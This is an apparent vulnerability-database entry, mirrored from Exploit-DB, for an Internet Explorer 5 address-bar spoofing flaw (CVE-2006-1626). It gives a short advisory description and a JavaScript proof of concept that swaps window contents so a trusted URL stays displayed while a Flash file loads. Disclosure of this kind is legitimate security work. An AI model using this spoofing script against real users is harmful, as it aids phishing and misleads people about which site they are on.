Lucene search
+L

Microsoft Internet Explorer 5 - Address Bar Spoofing

🗓️ 03 Apr 2006 00:00:00Reported by Hai Nam LukeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Internet Explorer 5 Address Bar Spoofing vulnerability identified by SecurityFocu

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
Internet Explorer Plugin Loading Address Bar Spoofing (MS06-021; CVE-2006-1626)
4 Mar 201000:00
checkpoint_advisories
cve
CVE
CVE-2006-1626
5 Apr 200610:00
cve
cvelist
Cvelist
CVE-2006-1626
5 Apr 200610:00
cvelist
nvd
NVD
CVE-2006-1626
5 Apr 200610:04
nvd
prion
Prion
Spoofing
11 Apr 200623:02
prion
prion
Prion
Code injection
5 Apr 200610:04
prion
securityvulns
securityvulns
Microsoft Security Bulletin MS06-021
13 Jun 200600:00
securityvulns
nessus
Tenable Nessus
MS06-021: Cumulative Security Update for Internet Explorer (916281)
13 Jun 200600:00
nessus
source: https://www.securityfocus.com/bid/17404/info

Internet Explorer is prone to address-bar spoofing.

An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain.

<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;

do { var curDate = new Date(); }
while(curDate-date < ms);
}

function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.example.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')

}
</script>
<a href="javascript: spoof()">Perform the test</a>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Aug 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.25283
26